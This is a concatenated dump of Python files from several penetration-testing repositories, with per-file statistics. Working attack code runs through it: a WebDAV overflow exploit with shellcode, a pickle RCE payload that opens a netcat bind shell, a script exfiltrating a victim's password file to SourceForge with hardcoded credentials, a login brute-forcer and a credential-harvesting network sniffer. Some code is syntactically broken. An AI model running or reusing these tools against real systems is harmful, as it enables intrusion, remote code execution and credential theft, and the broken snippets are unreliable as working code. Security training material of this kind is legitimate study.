5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7\xa5\x81\xe7\xa9\x90\xe4\xa9\xac'
pay+='>'
pay+=' (Not <locktoken:write1>) <http://localhost/bbbbbbb'
pay+='\xe7\xa5\x88\xe6\x85\xb5\xe4\xbd\x83\xe6\xbd\xa7\xe6\xad\xaf\xe4\xa1\x85\xe3\x99\x86\xe6\x9d\xb5\xe4\x90\xb3\xe3\xa1\xb1\xe5\x9d\xa5\xe5\xa9\xa2\xe5\x90\xb5\xe5\x99\xa1\xe6\xa5\x92\xe6\xa9\x93\xe5\x85\x97\xe3\xa1\x8e\xe5\xa5\x88\xe6\x8d\x95\xe4\xa5\xb1\xe4\x8d\xa4\xe6\x91\xb2\xe3\x91\xa8\xe4\x9d\x98\xe7\x85\xb9\xe3\x8d\xab\xe6\xad\x95\xe6\xb5\x88\xe5\x81\x8f\xe7\xa9\x86\xe3\x91\xb1\xe6\xbd\x94\xe7\x91\x83\xe5\xa5\x96\xe6\xbd\xaf\xe7\x8d\x81\xe3\x91\x97\xe6\x85\xa8\xe7\xa9\xb2\xe3\x9d\x85\xe4\xb5\x89\xe5\x9d\x8e\xe5\x91\x88\xe4\xb0\xb8\xe3\x99\xba\xe3\x95\xb2\xe6\x89\xa6\xe6\xb9\x83\xe4\xa1\xad\xe3\x95\x88\xe6\x85\xb7\xe4\xb5\x9a\xe6\x85\xb4\xe4\x84\xb3\xe4\x8d\xa5\xe5\x89\xb2\xe6\xb5\xa9\xe3\x99\xb1\xe4\xb9\xa4\xe6\xb8\xb9\xe6\x8d\x93\xe6\xad\xa4\xe5\x85\x86\xe4\xbc\xb0\xe7\xa1\xaf\xe7\x89\x93\xe6\x9d\x90\xe4\x95\x93\xe7\xa9\xa3\xe7\x84\xb9\xe4\xbd\x93\xe4\x91\x96\xe6\xbc\xb6\xe7\x8d\xb9\xe6\xa1\xb7\xe7\xa9\x96\xe6\x85\x8a\xe3\xa5\x85\xe3\x98\xb9\xe6\xb0\xb9\xe4\x94\xb1\xe3\x91\xb2\xe5\x8d\xa5\xe5\xa1\x8a\xe4\x91\x8e\xe7\xa9\x84\xe6\xb0\xb5\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\x
a9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81'
shellcode='VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB6X6WMV7O7Z8Z8Y8Y2TMTJT1M017Y6Q01010ELSKS0ELS3SJM0K7T0J061K4K6U7W5KJLOLMR5ZNL0ZMV5L5LMX1ZLP0V3L5O5SLZ5Y4PKT4P4O5O4U3YJL7NLU8PMP1QMTMK051P1Q0F6T00NZLL2K5U0O0X6P0NKS0L6P6S8S2O4Q1U1X06013W7M0B2X5O5R2O02LTLPMK7UKL1Y9T1Z7Q0FLW2RKU1P7XKQ3O4S2ULR0DJN5Q4W1O0HMQLO3T1Y9V8V0O1U0C5LKX1Y0R2QMS4U9O2T9TML5K0RMP0E3OJZ2QMSNNKS1Q4L4O5Q9YMP9K9K6SNNLZ1Y8NMLML2Q8Q002U100Z9OKR1M3Y5TJM7OLX8P3ULY7Y0Y7X4YMW5MJULY7R1MKRKQ5W0X0N3U1KLP9O1P1L3W9P5POO0F2SMXJNJMJS8KJNKPA'
pay+=shellcode
pay+='>\r\n\r\n'
print pay
sock.send(pay)
data = sock.recv(80960)
print data
sock.close
| 131.956522 | 2,183 | 0.77547 |
cybersecurity-penetration-testing | #Linear Conruential Generator reverse from known mod, multiplier and increment + final 2 chars of each random value
#Replace hardcode numbers with known numbers
print "Starting attempt to brute"
for i in range(100000, 99999999):
a = str((1664525 * int(str(i)+'00') + 1013904223) % 2**31)
if a[-2:] == "47":
b = str((1664525 * int(a) + 1013904223) % 2**31)
if b[-2:] == "46":
c = str((1664525 * int(b) + 1013904223) % 2**31)
if c[-2:] == "57":
d = str((1664525 * int(c) + 1013904223) % 2**31)
if d[-2:] == "56":
e = str((1664525 * int(d) + 1013904223) % 2**31)
if e[-2:] == "07":
f = str((1664525 * int(e) + 1013904223) % 2**31)
if f[-2:] == "38":
g = str((1664525 * int(f) + 1013904223) % 2**31)
if g[-2:] == "81":
h = str((1664525 * int(g) + 1013904223) % 2**31)
if h[-2:] == "32":
j = str((1664525 * int(h) + 1013904223) % 2**31)
if j[-2:] == "19":
k = str((1664525 * int(j) + 1013904223) % 2**31)
if k[-2:] == "70":
l = str((1664525 * int(k) + 1013904223) % 2**31)
if l[-2:] == "53":
print "potential number found: "+l
print "next 9 values are:"
for i in range(1, 10):
l = str((1664525 * int(l) + 1013904223) % 2**31)
print l[-2:] | 38.060606 | 115 | 0.51087 |
Hands-On-Penetration-Testing-with-Python | #!/usr/bin/env python
# -*- coding: utf-8 -*-
misp_url = 'http://127.0.0.1/'
misp_key = '0O4Nt6Cjgk9nkPdVennsA6axsYIgdRvf2FQYY5lx'
misp_verifycert = False
| 21.428571 | 53 | 0.692308 |
Python-Penetration-Testing-for-Developers | print"<MaltegoMessage>"
print"<MaltegoTransformResponseMessage>"
print" <Entities>"
def maltego(entity, value, addvalues):
print" <Entity Type=\"maltego."+entity+"\">"
print" <Value>"+value+"</Value>"
print" <AdditionalFields>"
for value, item in addvalues.iteritems():
print" <Field Name=\""+value+"\" DisplayName=\""+value+"\" MatchingRule=\"strict\">"+item+"</Field>"
print" </AdditionalFields>"
print" </Entity>"
# Example invocation: emit one IP entity, then close the transform response.
maltego("ip", "127.0.0.1", {"domain": "google.com"})
print"  </Entities>"
print"</MaltegoTransformResponseMessage>"
print"</MaltegoMessage>"
owtf | """
tests.functional.plugins.web.active.test_web_active
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""
from tests.owtftest import OWTFCliWebPluginTestCase
class OWTFCliWebActivePluginTest(OWTFCliWebPluginTestCase):
    """Functional tests for the OWTF web/active plugin group.

    The two test methods previously duplicated the run/assert boilerplate;
    it is factored into private helpers so the per-tool expectations stand out.
    """

    categories = ["plugins", "web", "active"]

    def _run_active_plugin(self, plugin_code):
        """Run a single web/active plugin by code against the test target."""
        self.run_owtf(
            "-o",
            plugin_code,
            "-t",
            "active",
            "%s://%s:%s" % (self.PROTOCOL, self.IP, self.PORT),
        )

    def _assert_plugin_launched(self, plugin_banner, tool):
        """Assert the worker scheduled and started the expected plugin."""
        self.assert_is_in_logs(
            "1 - Target: %s://%s:%s -> Plugin: %s"
            % (self.PROTOCOL, self.IP, self.PORT, plugin_banner),
            name="Worker",
            msg="%s web active plugin should have been run!" % tool,
        )
        self.assert_is_in_logs(
            "Execution Start Date/Time:",
            name="Worker",
            msg="%s web active plugin should have been started!" % tool,
        )

    def _assert_single_plugin_and_clean_exit(self):
        """Assert no second plugin ran and OWTF terminated normally."""
        self.assert_is_not_in_logs(
            "2 - Target:", name="Worker", msg="No other plugins should have been run!"
        )
        self.assert_is_in_logs(
            "All jobs have been done. Exiting.",
            name="MainProcess",
            msg="OWTF did not finish properly!",
        )

    def test_web_active_wvs_001(self):
        """Test OWTF web active WVS 001 plugin (Arachni)."""
        self._run_active_plugin("OWTF-WVS-001")
        self._assert_plugin_launched("Arachni Unauthenticated (web/active)", "Arachni")
        # Test arachni didn't raise an error
        self.assert_is_not_in_logs(
            "unrecognized option",
            name="Worker",
            msg="An error occured when running Arachni web active plugin!",
        )
        self._assert_single_plugin_and_clean_exit()

    def test_web_active_wvs_006(self):
        """Test OWTF web active WVS 006 plugin (Skipfish)."""
        self._run_active_plugin("OWTF-WVS-006")
        self._assert_plugin_launched("Skipfish Unauthenticated (web/active)", "Skipfish")
        self.assert_is_in_logs(
            "This was a great day for science!",
            name="Worker",
            msg="Skipfish did not finish properly!",
        )
        self._assert_single_plugin_and_clean_exit()
| 33.174419 | 86 | 0.517699 |
cybersecurity-penetration-testing | import urllib2
import json
GOOGLE_API_KEY = "{Insert your Google API key}"
target = "packtpub.com"
api_response = urllib2.urlopen("https://www.googleapis.com/plus/v1/people?query="+target+"&key="+GOOGLE_API_KEY).read()
json_response = json.loads(api_response)
for result in json_response['items']:
name = result['displayName']
print name
image = result['image']['url'].split('?')[0]
f = open(name+'.jpg','wb+')
f.write(urllib2.urlopen(image).read())
f.close()
| 30 | 120 | 0.658586 |
cybersecurity-penetration-testing | #!/usr/bin/python
#
# Pickle deserialization RCE payload.
# To be invoked with command to execute at it's first parameter.
# Otherwise, the default one will be used.
#
import cPickle
import os
import sys
import base64
# Fallback payload: bind /bin/bash to TCP port 4444 via netcat.
DEFAULT_COMMAND = "netcat -c '/bin/bash -i' -l -p 4444"
# Command executed on unpickling; taken from argv[1] when provided.
COMMAND = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_COMMAND
class PickleRce(object):
    """Picklable object whose deserialization executes COMMAND.

    cPickle invokes __reduce__ when pickling; on loads() the returned
    callable is applied to the returned args, running the shell command.
    """

    def __reduce__(self):
        payload = (os.system, (COMMAND,))
        return payload
# Print the base64-encoded pickle so it can be delivered to a vulnerable app.
print base64.b64encode(cPickle.dumps(PickleRce()))
Python-for-Offensive-PenTest | '''
Caution
--------
Using this script for any malicious purpose is prohibited and against the law. Please read SourceForge terms and conditions carefully.
Use it on your own risk.
'''
# Python For Offensive PenTest
# Source Forge Docs
# http://sourceforge.net/p/forge/documentation/File%20Management/
# https://sourceforge.net/p/forge/documentation/SCP/
# Pycrypto: pycrypto-2.6.win32-py2.7
# Download link: http://www.voidspace.org.uk/python/modules.shtml#pycrypto
# Interacting with Source Forge
import paramiko # pip install paramiko
import scp # download link: https://pypi.python.org/pypi/scp
ssh_client = paramiko.SSHClient() # creating an ssh_client instance using paramiko sshclient class
'''
when you connect to an ssh server at the first time, if the ssh server keys are not stores on the client side, you will get a warning
message syaing that the server keys are not chached in the system and will promopt whether you want to accecpt those keys.
since we do an automation on the target side, we inform paramiko to accept these keys for the first time without interrupting the session or
prompting the user and this done via > set_missing_host_key_policy(paramiko.AutoAddPolicy()
'''
ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh_client.connect("web.sourceforge.net", username="hkhrais", password="[123justyouandme]") #Authenticate ourselves to the sourceforge server
print '[+] Authenticating against web.sourceforge.net ...' #please use your own login credentials :D
scp = scp.SCPClient(ssh_client.get_transport()) #after a sucessful authentication the ssh session id will be passed into SCPClient function
scp.put('C:/Users/Hussam/Desktop/password.txt') # upload to file( in this case it's password.txt) that we want to grab from the target to /root directroy
print '[+] File is uploaded '
scp.close()
print '[+] Closing the socket'
| 30.095238 | 153 | 0.743105 |
cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
from anonBrowser import *
from BeautifulSoup import BeautifulSoup
import os
import optparse
def mirrorImages(url, dir):
ab = anonBrowser()
ab.anonymize()
html = ab.open(url)
soup = BeautifulSoup(html)
image_tags = soup.findAll('img')
for image in image_tags:
filename = image['src'].lstrip('http://')
filename = os.path.join(dir,\
filename.replace('/', '_'))
print '[+] Saving ' + str(filename)
data = ab.open(image['src']).read()
ab.back()
save = open(filename, 'wb')
save.write(data)
save.close()
def main():
parser = optparse.OptionParser('usage %prog '+\
'-u <target url> -d <destination directory>')
parser.add_option('-u', dest='tgtURL', type='string',\
help='specify target url')
parser.add_option('-d', dest='dir', type='string',\
help='specify destination directory')
(options, args) = parser.parse_args()
url = options.tgtURL
dir = options.dir
if url == None or dir == None:
print parser.usage
exit(0)
else:
try:
mirrorImages(url, dir)
except Exception, e:
print '[-] Error Mirroring Images.'
print '[-] ' + str(e)
# Run main() only when executed as a script (not when imported).
if __name__ == '__main__':
    main()
| 22.034483 | 58 | 0.561798 |
cybersecurity-penetration-testing | # Vigenere Cipher (Polyalphabetic Substitution Cipher)
# http://inventwithpython.com/hacking (BSD Licensed)
import pyperclip

# Symbol set used by the cipher; characters outside it pass through unchanged.
LETTERS = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
def main():
    """Demo driver: encrypt (or decrypt) the hard-coded sample text with a
    hard-coded key, print the result and copy it to the clipboard."""
    # This text can be copy/pasted from http://invpy.com/vigenereCipher.py
    myMessage = """Alan Mathison Turing was a British mathematician, logician, cryptanalyst, and computer scientist. He was highly influential in the development of computer science, providing a formalisation of the concepts of "algorithm" and "computation" with the Turing machine. Turing is widely considered to be the father of computer science and artificial intelligence. During World War II, Turing worked for the Government Code and Cypher School (GCCS) at Bletchley Park, Britain's codebreaking centre. For a time he was head of Hut 8, the section responsible for German naval cryptanalysis. He devised a number of techniques for breaking German ciphers, including the method of the bombe, an electromechanical machine that could find settings for the Enigma machine. After the war he worked at the National Physical Laboratory, where he created one of the first designs for a stored-program computer, the ACE. In 1948 Turing joined Max Newman's Computing Laboratory at Manchester University, where he assisted in the development of the Manchester computers and became interested in mathematical biology. He wrote a paper on the chemical basis of morphogenesis, and predicted oscillating chemical reactions such as the Belousov-Zhabotinsky reaction, which were first observed in the 1960s. Turing's homosexuality resulted in a criminal prosecution in 1952, when homosexual acts were still illegal in the United Kingdom. He accepted treatment with female hormones (chemical castration) as an alternative to prison. Turing died in 1954, just over two weeks before his 42nd birthday, from cyanide poisoning. An inquest determined that his death was suicide; his mother and some others believed his death was accidental. On 10 September 2009, following an Internet campaign, British Prime Minister Gordon Brown made an official public apology on behalf of the British government for "the appalling way he was treated." 
As of May 2012 a private member's bill was before the House of Lords which would grant Turing a statutory pardon if enacted."""
    myKey = 'ASIMOV'
    myMode = 'encrypt' # set to 'encrypt' or 'decrypt'

    if myMode == 'encrypt':
        translated = encryptMessage(myKey, myMessage)
    elif myMode == 'decrypt':
        translated = decryptMessage(myKey, myMessage)

    print('%sed message:' % (myMode.title()))
    print(translated)
    # Clipboard copy is a convenience for pasting the result elsewhere.
    pyperclip.copy(translated)
    print()
    print('The message has been copied to the clipboard.')
def encryptMessage(key, message):
    """Encrypt `message` with the Vigenere cipher under `key`."""
    return translateMessage(key, message, mode='encrypt')
def decryptMessage(key, message):
    """Decrypt `message` with the Vigenere cipher under `key`."""
    return translateMessage(key, message, mode='decrypt')
def translateMessage(key, message, mode):
    """Core Vigenere routine shared by encryptMessage/decryptMessage.

    Letters are shifted by the current key letter; any other symbol is
    copied through unchanged and does not consume a key letter.
    """
    translated = []
    keyIndex = 0
    key = key.upper()

    for symbol in message:
        num = LETTERS.find(symbol.upper())
        if num == -1:
            # Non-letter: pass through without advancing the key.
            translated.append(symbol)
            continue

        shift = LETTERS.find(key[keyIndex])
        if mode == 'encrypt':
            num += shift
        elif mode == 'decrypt':
            num -= shift
        num %= len(LETTERS)  # wrap around the alphabet

        # Preserve the case of the original symbol.
        translated.append(LETTERS[num] if symbol.isupper() else LETTERS[num].lower())

        # Advance to the next key letter, wrapping at the end of the key.
        keyIndex = (keyIndex + 1) % len(key)

    return ''.join(translated)
# If vigenereCipher.py is run as a script (instead of imported as a module),
# call the main() demo driver.
if __name__ == '__main__':
    main()
owtf | """
Plugin for probing ftp
"""
from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = " FTP Probing "
def run(PluginInfo):
    """Dump the FTP probing commands registered under BruteFtpProbeMethods."""
    probe_resources = get_resources("BruteFtpProbeMethods")
    return plugin_helper.CommandDump(
        "Test Command", "Output", probe_resources, PluginInfo, []
    )
| 22.071429 | 88 | 0.745342 |
cybersecurity-penetration-testing | import requests
from requests.auth import HTTPBasicAuth
with open('passwords.txt') as passwords:
for pass in passwords.readlines():
r = requests.get('http://packtpub.com/login', auth=HTTPBasicAuth('user', pass, allow_redirects=False)
if r.status_code == 301 and 'login' not in r.headers['location']:
print 'Login successful, password:', pass
break | 42.666667 | 109 | 0.67602 |
Python-Penetration-Testing-Cookbook | from urllib.request import urlopen
from xml.etree.ElementTree import parse
url = urlopen('http://feeds.feedburner.com/TechCrunch/Google')
xmldoc = parse(url)
xmldoc.write('output.xml')
for item in xmldoc.iterfind('channel/item'):
title = item.findtext('title')
desc = item.findtext('description')
date = item.findtext('pubDate')
link = item.findtext('link')
print(title)
print(desc)
print(date)
print(link)
print('---------')
| 24.833333 | 62 | 0.676724 |
hackipy | #!/usr/bin/python3
try:
print("[>] Importing modules")
import scapy.all as scapy
import scapy.layers.http as http
import argparse
except ModuleNotFoundError:
print("[!] Missing required modules, Exiting...")
exit()
else:
print("[>] Modules successfully imported")
print() # Just a line break
########################################################################
# User Defined Functions
########################################################################
def do_nothing():
    """No-op placeholder that keeps the conditional print expressions tidy."""
    return None
def get_arguments():
    """Parse the optional command line flags.

    Returns a (interface, mute) tuple: the capture interface (or None) and
    whether output should be reduced.
    """
    arg_parser = argparse.ArgumentParser(description="All arguments are optional")
    arg_parser.add_argument("-i", "--interface", help="Interface to sniff on", dest="interface")
    arg_parser.add_argument("-s", "--silent", help="Show less output", action="store_true", dest='mute')
    parsed = arg_parser.parse_args()
    return parsed.interface, parsed.mute
def is_root():
    """Return True when the script runs with root privileges (uid 0).

    Bug fix: the module never imports `subprocess`, so the original call to
    subprocess.check_output raised NameError at runtime; import it locally
    to keep the function self-contained.
    """
    import subprocess
    current_user_id = int(subprocess.check_output(["id", "-u"]))
    return current_user_id == 0
def get_default_interface():
    """Return the network interface named in the default route.

    Bug fixes: `subprocess` and `re` were never imported at module level
    (NameError at runtime), and passing a list together with shell=True made
    "|", "grep", "default" positional shell parameters instead of a pipeline —
    effectively running bare `route`. A single command string restores the
    intended `route | grep default` pipe.
    """
    import re
    import subprocess
    default_routing_table = str(subprocess.check_output("route | grep default", shell=True))
    default_interface = re.search("[lawethn]{3,4}[\d]{1,2}", default_routing_table)
    # NOTE(review): assumes a match is always found; a missing default route
    # would make this raise TypeError — confirm acceptable for this tool.
    return default_interface[0]
def sniff(interface):
    """This function will sniff packets on provided interface
    and call process_packet function to filter and display
    the result"""
    print("[>] Sniffing started, Capturing interesting packets\n")
    # scapy.sniff blocks until interrupted; store=False avoids keeping every
    # captured packet in memory, prn handles each packet as it arrives.
    scapy.sniff(iface=interface,store=False,prn=process_packet)
def process_packet(packet):
    """Filter one sniffed packet and print URLs, credentials and DNS queries.

    Called by scapy for every captured packet; uninteresting packets are
    silently ignored.
    """
    # HTTP requests: always show the URL, and inspect the Raw payload (which
    # usually carries POSTed form data) for credential keywords.
    if packet.haslayer(http.HTTPRequest):
        print(f"\n[+] URL >> {extract_url(packet)}\n")
        if packet.haslayer(scapy.Raw):
            creds = extract_username_password(packet)
            if creds:
                print(f"\n\n[+] Possible Username Password Combination >> {creds}\n\n")

    # DNS queries: print each name the first time it is seen.
    if packet.haslayer(scapy.DNSQR):
        dns_request = extract_dns_requests(packet)
        if dns_request:
            print(f"[+] DNS Request >> {dns_request}")
def extract_url(packet):
    """Rebuild the requested URL (host + path) from an HTTPRequest layer."""
    request_layer = packet[http.HTTPRequest]
    raw_url = str(request_layer.Host + request_layer.Path)
    # Host/Path are bytes, so str() yields "b'...'"; strip that wrapper.
    return raw_url[2:-1]
def extract_username_password(packet):
    """Return the Raw payload when it contains a credential keyword, else None."""
    payload = str(packet[scapy.Raw].load)[2:-1]  # strip the b'...' wrapper

    # Any keyword hit marks the whole payload as a potential credential post.
    for marker in keywords:
        if marker in payload:
            return payload
    return None
def extract_dns_requests(packet):
    """Return the queried DNS name the first time it is seen, None otherwise."""
    queried_name = str(packet[scapy.DNSQR].qname)[2:-1]  # strip b'...' wrapper

    # Suppress duplicates via the module-level seen list.
    if queried_name in dns_packets:
        return None
    dns_packets.append(queried_name)
    return queried_name
########################################################################
# The main function
########################################################################

# Tokens that suggest a Raw payload carries login credentials.
keywords = [
    "user","username","usr","name","usrname","uname",
    "password","pass","passwd","passwrd"
]
# DNS query names already printed, used to suppress duplicate output.
dns_packets = []

# Processing arguments
interface, mute = get_arguments()
if not interface:
    print("[-] Interface not provided, selecting default interface") if not mute else do_nothing()
    interface = get_default_interface()

# Checking for sufficient privileges (raw sockets require root)
if is_root():
    do_nothing()
else:
    print("[!] Please run the script as root")
    exit()

# Pre-reporting
print(f"[>] Interface is set to {interface}") if not mute else do_nothing()
print(f"\n[+] Starting sniffing") if not mute else do_nothing()

# Starting the sniffing (blocks until interrupted)
sniff(interface) # It ain't much but it's honest work (Well, it isn't)

# Stopping the sniffing
print()
print("[+] Stopping sniffing") if not mute else do_nothing()
print("[+] Exiting...")
owtf | from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Plugin to assist manual testing"
def run(PluginInfo):
    """Render a link list of the registered external admin-interface resources."""
    admin_resources = get_resources("ExternalAdminInterfaces")
    return plugin_helper.resource_linklist("Online Resources", admin_resources)
| 27.909091 | 75 | 0.782334 |
Python-Penetration-Testing-for-Developers | from scapy.all import *
# Craft and send a SYN to 192.168.0.11:80, show the reply, then tear the
# half-open connection down with a RST.
ip1 = IP(src="192.168.0.10", dst ="192.168.0.11" )
tcp1 = TCP(sport =1024, dport=80, flags="S", seq=12345)
packet = ip1/tcp1
p =sr1(packet, inter=1)
p.show()

rs1 = TCP(sport =1024, dport=80, flags="R", seq=12347)
packet1=ip1/rs1
p1 = sr1(packet1)
# Bug fix: the original said `p1.show` without parentheses — a no-op
# attribute reference; the method must be called to print the reply.
p1.show()
cybersecurity-penetration-testing | import mechanize, cookielib, random
class anonBrowser(mechanize.Browser):
    """mechanize.Browser subclass that randomises its user agent and proxy
    and clears cookies to make consecutive requests harder to correlate."""

    # NOTE: the mutable list defaults are kept for interface compatibility;
    # neither list is ever mutated in place, so they are safe here.
    def __init__(self, proxies = [], user_agents = []):
        mechanize.Browser.__init__(self)
        self.set_handle_robots(False)
        self.proxies = proxies
        self.user_agents = user_agents + ['Mozilla/4.0 ',\
            'FireFox/6.01','ExactSearch', 'Nokia7110/1.0']
        # anonymize() below installs a fresh cookie jar, UA and proxy.
        self.anonymize()

    def clear_cookies(self):
        """Install a brand-new, empty cookie jar."""
        self.cookie_jar = cookielib.LWPCookieJar()
        self.set_cookiejar(self.cookie_jar)

    def change_user_agent(self):
        """Pick a random user-agent string from the configured pool."""
        index = random.randrange(0, len(self.user_agents) )
        self.addheaders = [('User-agent', \
            ( self.user_agents[index] ))]

    def change_proxy(self):
        """Pick a random HTTP proxy, if any were configured."""
        if self.proxies:
            index = random.randrange(0, len(self.proxies))
            self.set_proxies( {'http': self.proxies[index]} )

    def anonymize(self, sleep = False):
        """Reset cookies, UA and proxy; optionally pause to decouple sessions."""
        self.clear_cookies()
        self.change_user_agent()
        self.change_proxy()

        if sleep:
            # Bug fix: `time` was never imported at module level, so
            # anonymize(sleep=True) raised NameError; import it locally.
            import time
            time.sleep(60)
owtf | """
GREP Plugin for CORS
NOTE: GREP plugins do NOT send traffic to the target and only grep the HTTP Transaction Log
"""
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Searches transaction DB for Cross Origin Resource Sharing headers"
def run(PluginInfo):
    """Grep the logged HTTP transactions for CORS-related response headers."""
    output = plugin_helper.HtmlString(
        "This plugin looks for HTML 5 Cross Origin Resource Sharing (CORS) headers<br/>"
    )
    output += plugin_helper.FindResponseHeaderMatchesForRegexpName("HEADERS_FOR_CORS")
    output += plugin_helper.FindResponseHeaderMatchesForRegexpName(
        "HEADERS_REGEXP_FOR_CORS_METHODS"
    )
    return output
| 34.333333 | 92 | 0.759055 |
cybersecurity-penetration-testing | def addNumbers(a, b):
return a + b
# Demonstrate calling the function and printing its return value (42).
spam = addNumbers(2, 40)
print(spam)
owtf | """
owtf.shell.base
~~~~~~~~~~~~~~~
The shell module allows running arbitrary shell commands and is critical to the framework
in order to run third party tools
"""
import logging
import os
import signal
import subprocess
from collections import defaultdict
from sqlalchemy.exc import SQLAlchemyError
from owtf.managers.target import target_manager, command_already_registered
from owtf.models.command import Command
from owtf.settings import INBOUND_PROXY_IP, INBOUND_PROXY_PORT, USER_AGENT
from owtf.utils.error import user_abort
from owtf.utils.strings import multi_replace_dict, scrub_output
from owtf.utils.timer import timer
__all__ = ["shell"]
class BaseShell(object):
    """Arbitrary shell-command runner used to drive third-party tools.

    Wraps subprocess execution with timing, user-cancellation handling and
    per-command persistence in the Command table.
    """

    def __init__(self):
        # Some settings like the plugin output dir are dynamic, config is no place for those
        self.dynamic_replacements = {}
        self.timer = timer
        self.command_time_offset = "Command"
        self.old_cmds = defaultdict(list)
        # Environment variables for shell
        self.shell_env = os.environ.copy()

    def refresh_replacements(self):
        """Refresh the replaced items in the list

        :return: None
        :rtype: None
        """
        self.dynamic_replacements["###plugin_output_dir###"] = target_manager.get_path(
            "plugin_output_dir"
        )

    def start_cmd(self, original_cmd, modified_cmd):
        """Start the timer and return the list of commands to run

        :param original_cmd: Original command
        :type original_cmd: `str`
        :param modified_cmd: Modified command to run
        :type modified_cmd: `str`
        :return: Dict of commands and start time
        :rtype: `dict`
        """
        if original_cmd == modified_cmd and modified_cmd in self.old_cmds:
            # Restore original command saved at modification time
            original_cmd = self.old_cmds[modified_cmd]
        self.timer.start_timer(self.command_time_offset)
        commands = {
            "OriginalCommand": original_cmd,
            "ModifiedCommand": modified_cmd,
            "Start": self.timer.get_start_date_time(self.command_time_offset),
        }
        return commands

    def finish_cmd(self, session, cmd_info, was_cancelled, plugin_info):
        """Finish the command run

        :param cmd_info: Command info dict
        :type cmd_info: `dict`
        :param was_cancelled: If cancelled by user, then true
        :type was_cancelled: `bool`
        :param plugin_info: Plugin context information
        :type plugin_info: `dict`
        :return: None
        :rtype: None
        """
        cmd_info["End"] = self.timer.get_end_date_time(self.command_time_offset)
        success = True
        if was_cancelled:
            success = False
        cmd_info["Success"] = success
        cmd_info["RunTime"] = self.timer.get_elapsed_time_as_str(
            self.command_time_offset
        )
        # NOTE(review): get_target_id is referenced without parentheses —
        # presumably a property on target_manager; confirm it is not a method.
        cmd_info["Target"] = target_manager.get_target_id
        cmd_info["PluginKey"] = plugin_info["key"]
        Command.add_cmd(session=session, command=cmd_info)

    def escape_shell_path(self, text):
        """Escape shell path characters in the text

        :param text: text to be escaped
        :type text: `str`
        :return: Modified text
        :rtype: `str`
        """
        # Raw strings avoid the invalid "\ " escape-sequence warnings the
        # original literals produced; the replacement values are unchanged.
        return multi_replace_dict(text, {" ": r"\ ", "(": r"\(", ")": r"\)"})

    def get_modified_shell_cmd(self, command, plugin_output_dir):
        """Returns the modified shell command to run

        :param command: Command to run
        :type command: `str`
        :param plugin_output_dir: Path to the plugin output directory
        :type plugin_output_dir: `str`
        :return: Modified command
        :rtype: `str`
        """
        self.refresh_replacements()
        new_cmd = "cd {};{}".format(
            self.escape_shell_path(plugin_output_dir),
            multi_replace_dict(command, self.dynamic_replacements),
        )
        new_cmd = multi_replace_dict(
            new_cmd,
            {
                "@@@USER_AGENT@@@": USER_AGENT,
                "@@@INBOUND_PROXY_IP@@@": INBOUND_PROXY_IP,
                "@@@INBOUND_PROXY_PORT@@@": INBOUND_PROXY_PORT,
            },
        )
        self.old_cmds[new_cmd] = command
        return new_cmd

    def can_run_cmd(self, session, command):
        """Check if command is already in place to run

        :param command: Command dict to check
        :type command: `dict`
        :return: List of return values
        :rtype: `list`
        """
        target = command_already_registered(
            session=session, original_command=command["OriginalCommand"]
        )
        if target:  # target_config will be None for a not found match
            return [target, False]
        return [None, True]

    def create_subprocess(self, command):
        """Create a subprocess for the command to run

        :param command: Command to run
